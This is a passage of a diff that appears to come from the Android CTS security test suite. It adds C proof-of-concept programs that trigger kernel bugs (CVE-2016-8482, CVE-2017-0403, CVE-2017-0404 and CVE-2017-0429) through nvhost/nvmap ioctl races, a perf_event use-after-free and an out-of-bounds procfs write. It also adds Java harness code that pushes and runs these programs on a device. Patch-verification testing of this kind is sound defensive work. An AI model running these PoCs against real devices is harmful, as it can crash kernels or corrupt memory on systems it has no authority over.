+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c
new file mode 100644
index 0000000..41862a5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c
@@ -0,0 +1,205 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+// for syscall
+#include <sys/syscall.h>
+// for futex
+#include <linux/futex.h>
+#include <sys/time.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%d)\n", ##__VA_ARGS__, errno, errno)
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+#define NVMAP_IOC_MAGIC 'N'
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+
+#define NVHOST_IOCTL_MAGIC 'H'
+struct nvhost_set_error_notifier {
+ __u64 offset;
+ __u64 size;
+ __u32 mem;
+ __u32 padding;
+};
+#define NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER \
+ _IOWR(NVHOST_IOCTL_MAGIC, 111, struct nvhost_set_error_notifier)
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%d\n", errno, errno);
+ }
+ return ret;
+}
+
+struct nvhost_submit_args {
+ __u32 submit_version;
+ __u32 num_syncpt_incrs;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 timeout;
+ __u32 flags;
+ __u32 fence; /* Return value */
+ __u64 syncpt_incrs;
+ __u64 cmdbuf_exts;
+
+ __u64 pad[3]; /* future expansion */
+
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 reloc_shifts;
+ __u64 waitchks;
+ __u64 waitbases;
+ __u64 class_ids;
+ __u64 fences;
+};
+#define NVHOST_IOCTL_CHANNEL_SUBMIT \
+ _IOWR(NVHOST_IOCTL_MAGIC, 26, struct nvhost_submit_args)
+
+struct nvhost_syncpt_incr {
+ __u32 syncpt_id;
+ __u32 syncpt_incrs;
+};
+
+#define CLOSE_THREAD_NUM 1
+#define TRY_TIMES 2
+#define NVMAPDEV "/dev/nvmap"
+#define VICDEV "/dev/nvhost-vic"
+#define SYNC_NUM 1
+struct nvhost_set_error_notifier err1 = { 0 }, err2 = { 0 };
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+int nvmap, vic;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ int ret;
+ set_affinity(1);
+
+ while(attack){
+ ret = ioctl(vic, NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, &err1);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, j, ret;
+ int dma1, dma2;
+ struct nvmap_create_handle args = {
+ .size = PAGE_SIZE
+ };
+ struct nvmap_alloc_handle alloc = {
+ .heap_mask = 0xFFFFFFFF
+ };
+
+ struct nvhost_syncpt_incr incr[SYNC_NUM];
+
+ struct nvhost_submit_args submit = {
+ .num_syncpt_incrs = SYNC_NUM,
+ .syncpt_incrs = (intptr_t)incr,
+ .timeout = 1,
+ //.class_ids = (intptr_t)&ret
+ };
+
+ memset(incr, 0, sizeof(incr));
+ incr[0].syncpt_id = 6;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ nvmap = open(NVMAPDEV, O_RDONLY);
+ if(nvmap == -1)
+ ERR("[-] open %s failed", NVMAPDEV);
+ else
+ LOG("[+] open %s OK", NVMAPDEV);
+
+ vic = open(VICDEV, O_RDONLY);
+ if(vic == -1)
+ ERR("[-] open %s failed", VICDEV);
+ else
+ LOG("[+] open %s OK", VICDEV);
+
+ // prepare
+ ret = ioctl(nvmap, NVMAP_IOC_CREATE, &args);
+ if(ret)
+ ERR("[-] ioctl NVMAP_IOC_CREATE failed");
+ else
+ LOG("[+] NVMAP_IOC_CREATE succeeded, fd = %d", args.handle);
+
+ dma1 = args.handle;
+ err1.mem = dma1;
+ alloc.handle = dma1;
+
+ ret = ioctl(nvmap, NVMAP_IOC_ALLOC, &alloc);
+ if(ret)
+ ERR("[-] ioctl NVMAP_IOC_ALLOC failed");
+ else
+ LOG("[+] NVMAP_IOC_ALLOC succeeded");
+
+ /* create close thread */
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ }
+ LOG("[+] running...");
+ while(1) {
+ ret = ioctl(vic, NVHOST_IOCTL_CHANNEL_SUBMIT, &submit);
+ }
+
+ LOG("[-] passed :(");
+ attack = 0;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++) {
+ pthread_join(close_thread_id[i], NULL);
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk
new file mode 100644
index 0000000..cb31e4d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0403
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c
new file mode 100644
index 0000000..51095e7
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c
@@ -0,0 +1,233 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+//overwrite object+0x20,like a list initilize
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <sys/wait.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+
+
+struct perf_event_attr {
+
+ /*
+ * Major type: hardware/software/tracepoint/etc.
+ */
+ __u32 type;
+
+ /*
+ * Size of the attr structure, for fwd/bwd compat.
+ */
+ __u32 size;
+
+ /*
+ * Type specific configuration information.
+ */
+ __u64 config;
+
+ union {
+ __u64 sample_period;
+ __u64 sample_freq;
+ };
+
+ __u64 sample_type;
+ __u64 read_format;
+
+ __u64 disabled : 1, /* off by default */
+ inherit : 1, /* children inherit it */
+ pinned : 1, /* must always be on PMU */
+ exclusive : 1, /* only group on PMU */
+ exclude_user : 1, /* don't count user */
+ exclude_kernel : 1, /* ditto kernel */
+ exclude_hv : 1, /* ditto hypervisor */
+ exclude_idle : 1, /* don't count when idle */
+ mmap : 1, /* include mmap data */
+ comm : 1, /* include comm data */
+ freq : 1, /* use freq, not period */
+ inherit_stat : 1, /* per task counts */
+ enable_on_exec : 1, /* next exec enables */
+ task : 1, /* trace fork/exit */
+ watermark : 1, /* wakeup_watermark */
+ /*
+ * precise_ip:
+ *
+ * 0 - SAMPLE_IP can have arbitrary skid
+ * 1 - SAMPLE_IP must have constant skid
+ * 2 - SAMPLE_IP requested to have 0 skid
+ * 3 - SAMPLE_IP must have 0 skid
+ *
+ * See also PERF_RECORD_MISC_EXACT_IP
+ */
+ precise_ip : 2, /* skid constraint */
+ mmap_data : 1, /* non-exec mmap data */
+ sample_id_all : 1, /* sample_type all events */
+
+ exclude_host : 1, /* don't count in host */
+ exclude_guest : 1, /* don't count in guest */
+
+ exclude_callchain_kernel : 1, /* exclude kernel callchains */
+ exclude_callchain_user : 1, /* exclude user callchains */
+ constraint_duplicate : 1,
+
+ __reserved_1 : 40;
+
+ union {
+ __u32 wakeup_events; /* wakeup every n events */
+ __u32 wakeup_watermark; /* bytes before wakeup */
+ };
+
+ __u32 bp_type;
+ union {
+ __u64 bp_addr;
+ __u64 config1; /* extension of config */
+ };
+ union {
+ __u64 bp_len;
+ __u64 config2; /* extension of config1 */
+ };
+ __u64 branch_sample_type; /* enum perf_branch_sample_type */
+
+ /*
+ * Defines set of user regs to dump on samples.
+ * See asm/perf_regs.h for details.
+ */
+ __u64 sample_regs_user;
+
+ /*
+ * Defines size of the user stack to dump on samples.
+ */
+ __u32 sample_stack_user;
+
+ /* Align to u64. */
+ __u32 __reserved_2;
+};
+
+
+#define PAIR_FD 1
+
+int group_fd[PAIR_FD],child_fd[PAIR_FD];
+
+long created = 0;
+long freed = 0;
+long finished = 0;
+
+void *thr(void *arg) {
+ printf("id=%d arg=%d\n",gettid(),arg);
+
+ int i;
+ struct perf_event_attr attr;
+
+ switch ((long)arg) {
+ case 0:
+ //#16123
+ printf("thread 0\n");
+ memset(&attr,0,sizeof(struct perf_event_attr));
+ attr.type = 1;
+ attr.size = sizeof(struct perf_event_attr);
+ attr.config = 1;
+
+ group_fd[0] = syscall(__NR_perf_event_open, &attr, 0x0ul, -1,
+ -1, 0x1ul, 0);
+
+ if(group_fd[0]<0){
+ perror("perf-group:");
+ }
+
+
+ memset(&attr,0,sizeof(struct perf_event_attr));
+ attr.type = 1;
+ attr.size = sizeof(struct perf_event_attr);
+ attr.config = 5;
+
+ child_fd[0] = syscall(__NR_perf_event_open, &attr,0x0ul, 0x6ul, group_fd[0], 0x0ul, 0);
+
+ if(group_fd[0]<0){
+ perror("perf-child:");
+ }
+
+ created = 1;
+ break;
+ case 1:
+
+ while(!created){
+ sleep(1);
+ }
+
+ printf("thread 1\n");
+ close(group_fd[0]);
+
+ freed = 1;
+
+ break;
+ case 2:
+
+ printf("thread 2\n");
+
+ while(!freed){
+ sleep(1);
+ }
+
+ close(child_fd[0]);
+
+ finished = 1;
+
+ break;
+
+ }
+ return 0;
+}
+
+int poc() {
+ long i;
+ pthread_t th[5];
+ for (i = 0; i < 3; i++) {
+ pthread_create(&th[i], 0, thr, (void *)i);
+ usleep(10000);
+ }
+
+ while(!finished){
+ sleep(1);
+ }
+
+ return 0;
+}
+
+
+int main(int argc, char const *argv[])
+{
+ int pid;
+ unsigned int times;
+ times = 0;
+ printf("POC3\n");
+ printf("Please enable CONFIG_SLUB_DEBUG_ON and check the posion overwriten message in kernel\n");
+ fflush(stdout);
+
+ // while(1){
+ pid = fork();
+ if(pid){
+ int status;
+ int ret = waitpid(pid,&status,0);
+
+ printf("[%d]times.\r",times);
+ times++;
+ }else
+ return poc();
+ // }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk
new file mode 100644
index 0000000..9e30d30
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0404
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c
new file mode 100644
index 0000000..54821ef
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c
@@ -0,0 +1,49 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/prctl.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <pthread.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <semaphore.h>
+#include <sys/socket.h>
+#include <sys/mman.h>
+#include <signal.h>
+#include <sys/wait.h>
+#include <sys/ioctl.h>
+#include <sys/utsname.h>
+#include <sys/ptrace.h>
+
+char buf[4096];
+
+int main(int argc, char const *argv[]){
+ memset(buf, 0xa0, sizeof(buf));
+
+ int fd = open("/proc/asound/version", O_RDWR);
+ if(fd != -1){
+ lseek(fd, 0x1234567800000000, SEEK_SET);
+ write(fd, buf, sizeof(buf));
+ }else{
+ perror("open error\n");
+ }
+ close(fd);
+ return 0;
+}
\ No newline at end of file
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk
new file mode 100644
index 0000000..afb77b4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0429
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c
new file mode 100644
index 0000000..4ef1b3e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c
@@ -0,0 +1,179 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+// for syscall
+#include <sys/syscall.h>
+// for futex
+#include <linux/futex.h>
+#include <sys/time.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%d)\n", ##__VA_ARGS__, errno, errno)
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+#define NVMAP_IOC_MAGIC 'N'
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+#define SZ_128K 0x00020000
+#define NVHOST_AS_IOCTL_MAGIC 'A'
+struct nvhost_as_bind_channel_args {
+ __u32 channel_fd; /* in */
+} __packed;
+#define NVHOST_AS_IOCTL_BIND_CHANNEL \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 1, struct nvhost_as_bind_channel_args)
+
+struct nvhost_as_free_space_args {
+ __u64 offset; /* in, byte address */
+ __u32 pages; /* in, pages */
+ __u32 page_size; /* in, bytes */
+};
+#define NVHOST_AS_IOCTL_FREE_SPACE \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 3, struct nvhost_as_free_space_args)
+
+#define NVHOST_AS_ALLOC_SPACE_FLAGS_SPARSE 0x2
+struct nvhost_as_alloc_space_args {
+ __u32 pages; /* in, pages */
+ __u32 page_size; /* in, bytes */
+ __u32 flags; /* in */
+ __u32 padding; /* in */
+ union {
+ __u64 offset; /* inout, byte address valid iff _FIXED_OFFSET */
+ __u64 align; /* in, alignment multiple (0:={1 or n/a}) */
+ } o_a;
+};
+#define NVHOST_AS_IOCTL_ALLOC_SPACE \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 6, struct nvhost_as_alloc_space_args)
+
+#define CLOSE_THREAD_NUM 1
+#define TRY_TIMES 2
+#define NVMAPDEV "/dev/nvmap"
+#define GPUDEV "/dev/nvhost-gpu"
+#define ASDEV "/dev/nvhost-as-gpu"
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+int nvmap, gpu, asgpu;
+volatile int attack;
+
+int main(void)
+{
+ int i, j, ret;
+ int dma1, dma2;
+ struct nvmap_create_handle args = {
+ .size = PAGE_SIZE
+ };
+ struct nvhost_as_bind_channel_args as_bind = { 0 };
+ struct nvhost_as_alloc_space_args alloc = {
+ .pages = 1,
+ .page_size = SZ_128K,
+ .flags = NVHOST_AS_ALLOC_SPACE_FLAGS_SPARSE
+ };
+ struct nvhost_as_free_space_args free_arg = {
+ .pages = 1,
+ .page_size = SZ_128K
+ };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ nvmap = open(NVMAPDEV, O_RDONLY);
+ if(nvmap == -1) {
+ ERR("[-] open %s failed", NVMAPDEV);
+ goto __cleanup;
+ }
+ gpu = open(GPUDEV, O_RDONLY);
+ if(gpu == -1) {
+ ERR("[-] open %s failed", GPUDEV);
+ goto __cleanup;
+ }
+ asgpu = open(ASDEV, O_RDONLY);
+ if(asgpu == -1) {
+ ERR("[-] open %s failed", ASDEV);
+ goto __cleanup;
+ }
+ // bind the channel
+ as_bind.channel_fd = gpu;
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_BIND_CHANNEL, &as_bind);
+ if(ret == -1) {
+ ERR("[-] NVHOST_AS_IOCTL_BIND_CHANNEL failed");
+ goto __cleanup;
+ } else {
+ //LOG("[+] ioctl OK, channel is bond");
+ }
+
+ #if 1
+ // prepare
+ ret = ioctl(nvmap, NVMAP_IOC_CREATE, &args);
+ if(ret) {
+ ERR("[-] NVMAP_IOC_CREATE failed");
+ goto __cleanup;
+ }
+ #endif
+
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_ALLOC_SPACE, &alloc);
+ if(ret) {
+ ERR("[-] NVHOST_AS_IOCTL_ALLOC_SPACE failed");
+ goto __cleanup;
+ }
+ free_arg.offset = alloc.o_a.offset;
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_FREE_SPACE, &free_arg);
+ if(ret) {
+ ERR("[-] NVHOST_AS_IOCTL_FREE_SPACE failed");
+ goto __cleanup;
+ }
+
+__cleanup:
+ close(nvmap);
+ close(gpu);
+ close(asgpu);
+ return 0;
+}
diff --git a/hostsidetests/security/src/android/security/cts/AdbUtils.java b/hostsidetests/security/src/android/security/cts/AdbUtils.java
index a3018fa..fa9934f 100644
--- a/hostsidetests/security/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/security/src/android/security/cts/AdbUtils.java
@@ -30,6 +30,7 @@
import java.io.InputStream;
import java.io.OutputStream;
import java.util.Scanner;
+import java.util.concurrent.TimeUnit;
public class AdbUtils {
@@ -39,8 +40,7 @@
* @param device device for the command to be ran on
* @return the console output from running the command
*/
- public static String runCommandLine(String command, ITestDevice device) throws Exception
- {
+ public static String runCommandLine(String command, ITestDevice device) throws Exception {
return device.executeShellCommand(command);
}
@@ -51,17 +51,25 @@
* @param device device to be ran on
* @return the console output from the binary
*/
- public static String runPoc(String pathToPoc, ITestDevice device) throws Exception {
- String fullResourceName = pathToPoc;
- File pocFile = File.createTempFile("poc", "");
- try {
- pocFile = extractResource(fullResourceName, pocFile);
- device.pushFile(pocFile, "/data/local/tmp/poc");
- device.executeShellCommand("chmod +x /data/local/tmp/poc");
- return device.executeShellCommand("/data/local/tmp/poc");
- } finally {
- pocFile.delete();
- }
+ public static String runPoc(String pocName, ITestDevice device) throws Exception {
+ device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+ return device.executeShellCommand("/data/local/tmp/" + pocName);
+ }
+
+ /**
+ * Pushes and runs a binary to the selected device
+ *
+ * @param pathToPoc a string path to poc from the /res folder
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+ * @return the console output from the binary
+ */
+ public static String runPoc(String pocName, ITestDevice device, int timeout) throws Exception {
+ device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+ CollectingOutputReceiver receiver = new CollectingOutputReceiver();
+ device.executeShellCommand("/data/local/tmp/" + pocName, receiver, timeout, TimeUnit.SECONDS, 0);
+ String output = receiver.getOutput();
+ return output;
}
/**
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_10.java b/hostsidetests/security/src/android/security/cts/Poc16_10.java
new file mode 100644
index 0000000..98e2c7f
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc16_10.java
@@ -0,0 +1,98 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceTestCase;
+
+import android.platform.test.annotations.RootPermissionTest;
+
+import java.io.BufferedOutputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.Scanner;
+
+public class Poc16_10 extends SecurityTestCase {
+
+ /**
+ * b/30904789
+ */
+ public void testPocCVE_2016_6730() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6730", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906023
+ */
+ public void testPocCVE_2016_6731() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6731", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906599
+ */
+ public void testPocCVE_2016_6732() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6732", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906694
+ */
+ public void testPocCVE_2016_6733() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6733", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30907120
+ */
+ public void testPocCVE_2016_6734() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6734", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30907701
+ */
+ public void testPocCVE_2016_6735() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6735", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30953284
+ */
+ public void testPocCVE_2016_6736() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6736", getDevice(), 60);
+ }
+ }
+}
